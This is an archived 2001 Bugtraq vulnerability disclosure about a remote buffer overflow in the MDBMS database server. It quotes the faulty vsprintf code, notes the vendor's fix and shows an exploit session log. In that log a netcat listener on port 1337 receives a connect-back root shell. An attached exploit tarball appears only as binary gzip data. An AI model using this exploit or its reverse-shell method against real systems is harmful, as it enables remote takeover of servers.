6618752 2001-06-12 21:47 +0200 /90 rader/ teleh0r - <teleh0r@digit-labs.org> Sänt av: joel@lysator.liu.se Importerad: 2001-06-14 00:08 av Brevbäraren Extern mottagare: BUGTRAQ@securityfocus.com Mottagare: Bugtraq (import) <17414> Ärende: Remote buffer overflow in MDBMS. ------------------------------------------------------------ Dear bugtraq readers, MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below versions contain an exploitable buffer overflow in the handling of the \s console command. When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow. Below is faulty code (from interface.cc): void user::uprintf(char *s, ...) { char b[10000]; int len=strlen(outbuf), newlen; va_list ap; va_start(ap,s); vsprintf(b,s,ap); <---- va_end(ap); newlen=strlen(b); while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000); strcat(outbuf,b); FD_SET(fd,&parent->wmask); } mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes. Information about the overflows was sent to marty@hinttech.com. He has now fixed the problems, and new versions of MDBMS can be found at: http://www.hinttech.com/mdbms/ We would like to thank Marty for kind response and quick update. Exploit example: ---------------- [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001 Usage: ./mdbms-pms.pl -t <hostname> -b <back> -t <hostname> : hostname to test -b <back> : connect back to ip -p <port> : port (default: 2223) -d <delay> : delay before timeout -o <offset> : offset -h : return to heap [teleh0r@localhost mdbms]$ nc -l -v -p 1337 & [1] 2070 listening on [any] 1337 ... [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h -- Remote code execution exploit - MDBMS <= 0.99b -- <teleh0r@digit-labs.org> - Copyright (c) 2001 -> Connected to: 127.1 / MDBMS V0.99b9 ready. -> Address : 0x302027d / xor-mask: 0x2020202 -> Return : 0x80cfe76 / using the heap ... -> Sending payload: ... -> * Successfully sent payload - good luck! connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189 [teleh0r@localhost mdbms]$ % nc -l -v -p 1337 whoami; uname -mnrsp root Linux localhost.localdomain 2.4.2-2 i686 unknown ... Exploit code attached. Sincerely yours, teleh0r and mu-b -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard (6618752) /teleh0r - <teleh0r@digit-labs.org>/------ Bilaga (application/x-gzip) i text 6618753 6618753 2001-06-12 21:47 +0200 /41 rader/ teleh0r - <teleh0r@digit-labs.org> Bilagans filnamn: "mdbms.tar.gz" Importerad: 2001-06-14 00:08 av Brevbäraren Extern mottagare: BUGTRAQ@securityfocus.com Mottagare: Bugtraq (import) <17415> Bilaga (text/plain) till text 6618752 Ärende: Bilaga (mdbms.tar.gz) till: Remote buffer overflow in MDBMS. ------------------------------------------------------------ ·o&; ì;iwÛÆ®ýjþâÄ£ ¤6[^nÒ$msn¶»}½×vu¸$ÖÉp±¥&¹¿ý.ò÷µÍ}KãHÌ0 ´ðEÚæË8ü¬ûÍ_rFß ðI×ú§ø>êf¿?ûߦվa¿f:õ+O3;aì$²Ûð>÷ü鵨é_ÜÅ´ÞiÜ¢Óóúú£!à÷fÿfüyS¸ùú®ÿû÷ºyt?ìÆ< 4í>ûÈÞñEqö4ò8{¾änùQÈü½zöí«#vÄ°ýftvw"yÅ«ÄÍ3¦»MfZ³bûøÜH{þÌÏÚí¤(É `D²§ÈÓë0|BO¿Íglå¡|ÆLòi±Ë¹pv%ç~8cY4ãÙæB$~6g¼ít .OîùY:fS?§ÿþ7ËóÄ)s Æ\»°Üv` 9bøÍíÍü²ï°c8<.E XÂòS¶°á^Øfî»ç,Ê3Bïtn.Û®c»çí w\FåË k'g¶¤MËSÎ"÷g{,M a@ßó,³ñø(óöØnR}+;ãxì£ñ|«ÅNØɬ¹§iþéú!÷ôM}Øʶ>5ìÛ Ôìpöé|GáãÄ+ððc GIVÁoÀ÷¾Ç{Uâ{7àG ?NÓÊü£ðç Îí¸29áÁ½D åáC±Þ&>ÌS{Æ'h{@³i ¶öØÃ8ñÃ%$ ðû' -èøíñ4:é*y2[uB5ÏÀ3;`/1~a§¸Ûöö8âßØÁ}fZ¾¦`vÆbÊ%XPiþm2·ù·5½qºì~ôÄ)>,úØÝw;Æð#î%ئÞTàîÐ5j í =oÕbhMXóCÜN´§Ñi²Ò·- míñ}ÖÝf;»°q2Øå´Ýó,ÇÝîååeMÝ!n4 ÚfÉå@çKÏ9]z(úgÏltÇ5Nü (ÓåÎîéëÁwCà8ÓÍ8íO GÓÑæ\ ÜF©;§Kc wÅ(Ãvv'¸7 ÀýÀP#Ê nôÌ33¦ oW|N +ù¨Î·8#Ä-ÎÀsrP6àzò~ïÂ'Çá=AW[)Æ3Bj ÞÍ_°;@ùSÃÀðÍ_±P!Ãl0Ø÷ÄÞgyÒ¥Ýú7f,ÃòÑáÆN§6÷2"ðãàã(M}ôÞYÄ$=|C¿N,ü0Í`o²hJ0 Ä·(-ÈÎ*¶Ó|m ÉÁ3ú3°2Ø_F!äK)BÚØÎÜy½ ñÃ(c6µÀ' ¢[Z4° G¢iÜ=íoàp9_±b9ȼÎ1(ÈKÈ5Èü ãÞ ðeÖqÝ1Ø)]o²3PÂoÿäﶬ-pÇ?0˲z þ=CF 7ýå7ÒLùÂðäè5`Ç<O2Á!Àéli|®R¶~ôæéß·ÐânmÁxCBØÁ¿XÚ½ßíÎöØæG ñ B¾éGÇÏÞüx>ñɵêö!$41BÆEèêJ§aC@S"yâyh¤`6îKÖeË(¡¸+ @ÓZwh ý·Ð(h1ÞI{-ÆÈSRy¡ïN§CIË|b<@~g^dÈ7°ZÔ=¤íUÙÞ546qlðÞM2¨C 4]°eìöÖ4rÂHÛì(w]ñ4Ç+åa¦F 5"¹{~Oh&æ«\,Ë`bÏ&v z"qÿñ#ZÞx$Qfp¯T<fRú¦/ >÷5â·GHiBØMpGM0òáÍÕ6JF¿#ÈF}ül6DÄ; ú²¿ÏvìðØä$±¤_D< æêa}"ªMRJh±*¨ÁøñDê¦Ëpû&]Ói©ëà@ 5S$b:å³ÃC\Ï](_RÃæç)¾¤°ú&áPÒÃ,6Sò©8 e?G/¾ÿ°õäå»WÓ0DúP³ >TúÜKMöIú%á a>ãLÀlÒÁɱ«ÉÅ¿ùËÆß³-p¿ùrSFp_è 7àvÒ éWaí[¯.ý°g¡§ym·µÕ)(/Ni2À~5uJ[óàÚÅñìtý|ÔWt§amßn¢bgÙ¼YN>òD9r_r_JªÊÞ$¬|0>Á³Népó¬ææª2è¨lbHÀy¬ÀW_} ªN É ªQ_¥t{w^f-b(d©ÙdXÝ£µëRh&!ɸoUî±ê¯ °2ø¢ÉoV·®Úÿ=!×Ôùè౯*ñúë:.}¼®¾Gê4׬µkU¦.T·¦õBãå¨39=M׸ArPB5b\Ϥ&ùàèL¶Ê¸%±K7¬®[ÂØf¬ø¤pðÇï8áp-9Hón|Oà3 ïÎ*´\ßÊÜx«y§ùáQý¡ßÛï&/^ãLß=òª%G»5>KqÉa\_Ë]T ¥¨òljZ;cxÿ^ÿÁÚÛG¢4Àó9l³C±Úµ§³1uK<O3¨ÕÇjê$ìÇ5fû¨À *åâºLóÇ7%²Çö)æÈ"89öWL"Gûbß*dq+Ï×ä:®0§Ô4Üo|égR ÿîúä×믽êõ'eý¾ 'è?±Øõÿa¿Óûþ`PÖÿ#ëÿ£Þ×úÿ¹´g2©w¬L[&GÈBlvô/gg6${pµÝÍwÁªIÀ¯_ü,SÖ´£ý$«xîReCËeÙ"EÏÙ~TÂ**%2' qTïÀò{ ªw4 0ý],àiiÚÎ9p¤úÃò OY ®iQxk¼aú¦ãx^? ¤-|¶ÁÅÚqD¹%¤ê·Ý¹a¶Ãà#åïs<óº6gË©Òã¨è¤VØÑ´oI4 jòý+ÐëÓ$ZÀ3@³]ÞqÝæXÓ."ߣõǹ,¸sÐß6L·Óé45LK⸷(<ÌÍÒ,¤Ùbôð1.ìIàCV%7ºÃMévÜJ)Ê^¤r4§¶ìR¤ý6\)Áà¨r&ÞØèâÑ#ü3ÃDêÿÙ©Íc»I/g"Wα%±ª¬];SÏÅß==?Ö§^ëal£U¶/åI2|!g·4¯lv5\TÊÖL/|°(gÃnp³^.ñÝðÂÕ»ybc]JC¦'H«#cra'T¬ñõÃÁz§þcDa^bO åÛÙAÁ¶ #DáÖápaæ N dií::ØÖÍÛ¦¡íà'¢V.ÖDe°Ö¨|õxKɸ;ïÕ¦úA¼ûÂé¹!=$w0³E* ÙrcÃR ëÀ9jWB¦Rµ¯"^:waûâ{½<ð`ÿÜ sÎ^á´ÈÉûÀ)ái ¹¼Ï}ȬòäÃaµÏåÙ/ílä±Ö^»4íD½+³Jåiü³MÖ©½þÖ´ß}ÄÖ*Gê;¨5Mf¡õ¡ÿe¤ìf¤·¨,tYÄuó7{½{¨g Û¡¡CãToØáêL üfÒ6QÇDiÈíù±+ n1®äü°·WVã6=Ã2¬W+tKË ZÀl,Õ;ëªÌÚuUdãï(új2>Ðì ®Ã -t h;ôÍTÑLsg÷6½=ÐÖA»GöÂßc9íö"LÒXÃDN{e¹µ:ýÕ¶?Üé9ø¾P£Õ*ÿBú¶³â?÷ ~ä.O8¬~å>ëÓ$' èì9ªÿ æwíÿ2FCc`PÿOÏ´¾ö}ë&ý¯7¦ü1n?ÿ¨n¥Ëàùodèëùï\Ým¦§×*; ä@§øn´)«üÙ2¸ I@,è %½.[-0í¬c"{òúÝ^I ;¨ì`%²`/ÃÇ]\b"HÂ?¿y·%X"=LáÀÅf}çß;a§2ºÌð%»e2Ilá»+pö)2K¢P£)Ó DÓgVÛ¡âÊ+¡¯#0×î<|LC-9 æÿB>Ad*Ñ ½&®¸&§8G *s âÓm$áBD]#º $C <Yð°/£Ì]>,T©Tõ\È=aEG/Ô×BUP?&DïBÂë-rTPìÛÕ}êªöôjÔÌÓÝÖ:³ NÌuøÌ;ÈJ ± ØXÛ¸¯ªÓVXËÇ×jôäÚBõ·oß½9~39~ú¶©m@l<àβÅðm#ÎÓ¹ll ÷ ¶¶AãZ¬Ê ·`ÉùÚ4¨ èÂÙØ4ÁXØ;@\øÎØdòúÝD¬+Úl Gÿ8z:qA¶ilÝ%Î$ÛØÄDOCA©ò;ò3¬sÈÍÔK¶ÿ·°nмÖèÁ¿þÈF\Ä» À¬lö°wÀ4ry%DÐâPß/©·kh5ólR'÷³·.ÄËÎrm鴆 NPøÕáÈ%Q]PK X¾yýúùÓR®B] itSä/ØF¡UMl *¼<¶ =ôÚÆ®Y#lÑ-×ëùÒ8,¢x|ãÃ^9S A~¿éäA*VP;0lJÝYáй}yFàzï+b,D |;£5ò*hwhYSkº&Þ&u Ý Ó¼"5 ·ýXCÇpL#ÈÁ¯ì§çGùaøÎlvŪÃÁÑ»~XÛIlwñ 5ªAn4©ÊIáÜNÎÀîÐkxVCÑixºÙ§K£/ú ©Ð}{ÆPGh!¬·J½ûp½óPêÍë µ¢êë}Ro=\o;s©u®wJ½ñp½éPê}ë=b.Ôv¨ÝÝZìèÉgÏþ1yùæ)ÓÞ¬?stÖ¼Btôâ¬_ ¾zrô÷ϲ²zuVD$Xi¸±§zòº=*çQõ¦%K¸Ô £ZJt¦ã³úy0ÎÉ^¦^ðëuz;O àZüõfÛñ¯¶ò(üfÑn Ë:¦xkÝ<ëª×RÛ ´<Zø¿ñR¢k¢Þ' ܳÖ6uA6ÓbÀXC®âb2t .©*-¥^Q´m!¸&'£°G̽ÈÑÝ+¥;H¶§"?MsùÆò2,x3ĤIwEÓ«zÖÜGdKxAl5à 4;v±é÷ Sý`~õÑ_¶àr5Ñκ¬|®.ÙǶÓj·¨¥úEèÁ}c'XbâØÔ¨zØhÙUJX½ÈB3µVu©Î8!aAê$Ü>/Vqj7¬yëÔØj¶6³ ÀÈb4²mæ©"iµ©A gÀ)^åâhQ²O½X¬E$ßµ|¼8®êMSönwZЯôÒ`å;æC±uýHüÒh|µ*f[m ½¤ ³öCöB2s[j»$³3eè´çôíiSÇn·7:ÙF#RF?¤Q/JѨãhØëd)Ó½Q9¹(?H!Ú ¡ã)Zsmój«+( ^¹8zù:êÆÕÈ#5ñ²_&`µØCÙgs[²9ñæõ<ÂYÎ÷Ê#§íÀy¶Ì½ri&åyWÖT5²Â®Sy &'wÔu~æÞI'"¡¯ÂV5Ĭ·V5h~WÌ[8/½f£ÿ»K_¯[®µßæmçÏÿðÿÛôGôûÏe_ë¿_âºFÿÂ×?Võ-¯ÏÔ¾9úïFFð=kôµþû%.LÊJ}5¹WcôzñgõS½þÒ;p$hÈÇp¤) Çéý`glÔ1[ÉÂ4d9²¼ LSò¹áÄhW~>,(ê-EézOÑÕnU¼¶«HvÝÔK´o'º©©?ÓPÄni(R/'Ú¢G¢§h.½AìCµ}è_Î}¡TµDÕc¿O8ÇL/~ÅÂ.ûþóì´ãqQéã¨ë¥ËÚmö@/D:¼÷xó(áþþJMàK,}@Ã é £+ÅodIQpqKmçó¥ ,e«§w«(º¿à×`g¶('©úÀë7o7eß, oß¼;ÞÀåÇW?ýøòõQ@Þ|÷ÝÑóc #³øáåîhq¿ÆÜ¿PÎVA²¦ðmʹ<hì©Æ3ÈÓ1Ãe0<øö Ã:d(üMBÊ¡{ZýðcÈãA'&ÚÙ¦½°gÍ8'Ó3¦òË ùQ¬ °^´+ÊLXê±Õ ¾¹½òá*xÒSÂCøÀ<øÎÅ÷²ºUâÑ/f;T㿼/ñ^¾¨þgUæ¶Sâá»râùPÍ£Ä3ûò9ó¯Ï³Ä[¯Æ $~jõq¯àJÙTå2k,½ Me½(_Uâ#]ìxÕùáó¾Y}V Õå2¥9ÄüFj~£oÚ²pijµ_x\êv:-ÿÊbbE~µ_<7®X¨üUا¦~¤l5T]G\`·ÔB/òÈßOy,[!Kæ#[ò±v]ú`ðSIÂØyÂÉkûaåÿÕÎõõ´ ñçöSxLf¤¥Ú Tû I{k Ðh× -L¤ÓP¿û||¶Ó8h/÷{¨Äw±}öù|¾K+B´"Ræ-<$#Ñ\H»)'o¹ü½,~ÒAÝÖ~+ù¿U/ÚC×v»ë¡d âOÝÎÙ¬\»ûl@Ú %r¿äfH<Í!oi¸Íth¶i:v^ìl¿çåÇÈô¨/9²Ci´7Ò$ F_ ÓdÉ%4ȱ«ip8&á² O¸93ÁÐ Ù7ãÌ^;¯¡AU]ì":¸ãÊÂ7Ê9Ù1x< âÇðè`^Ä4D>9|2<àÊ :!]|ð¯UµUÖ¦ÆæòoÛÚÌ\C·N{8>EÀiÄ]%T~¡º[8ÔÝá!þÝv_°SÜêüoÀM:X«ÏêxüÃ<=&°y#ô~A¦7!¨´¿B^µcëkk ?àt¿®2,Ô`J¿]sæb±êõ*#áÍylax ºÿú#?6¬v°·Ç²=ñTÆ>=ìç¯fFí©ûUÏße¯$Ts½¤´=hgíagdà_½ürqáÅ®âw*vÓæf½ìÏÖÑNgÅ÷a5¼´Óçþ\3Ìiõ+ë¸ÖÙ'º+Ñcµ¬n~ß!'EuÚPÎ9z èL-¹éõ`X ²HÉÞq ZCÙ£Ur0tèv×?ªü|g{w×8r¶ï>34÷Óϼ¼"%1õ ÅËjÄ©b1@k T»Ì6û·ûCv«§kÔY¢úøê8H6úy1¸íç^ºnK$TCl-È@À3w.aü¶dâJXO²n·57ûÎÆÏ ÎÜÞÌÊ(;?ÞªÚû±ºÌ)rA©ÏÊ7´Ú¬ö¥bB4¦ó ñÊÊ (Ô?¯3&¹6qãrB·ûóòFüß[äËιr v®C¦DøÙ5|*yÎ22=\ilïSZrS¥1+±øúö J8çoÚ°É&õJÎBÈTÀhy[}JIdý§Âñ(øV;o40¾kf=aÖ¶`;Ã]Òc&K{õá5drª HËGO¢ðGjXÇÚ)S~ ÅÉÉ»cú¨tJMÆuæ¦;.ýßÎX B¡P( B¡P( B¡P( B¡P( âø_0óÁ x (6618753) /teleh0r - <teleh0r@digit-labs.org>/(Ombruten)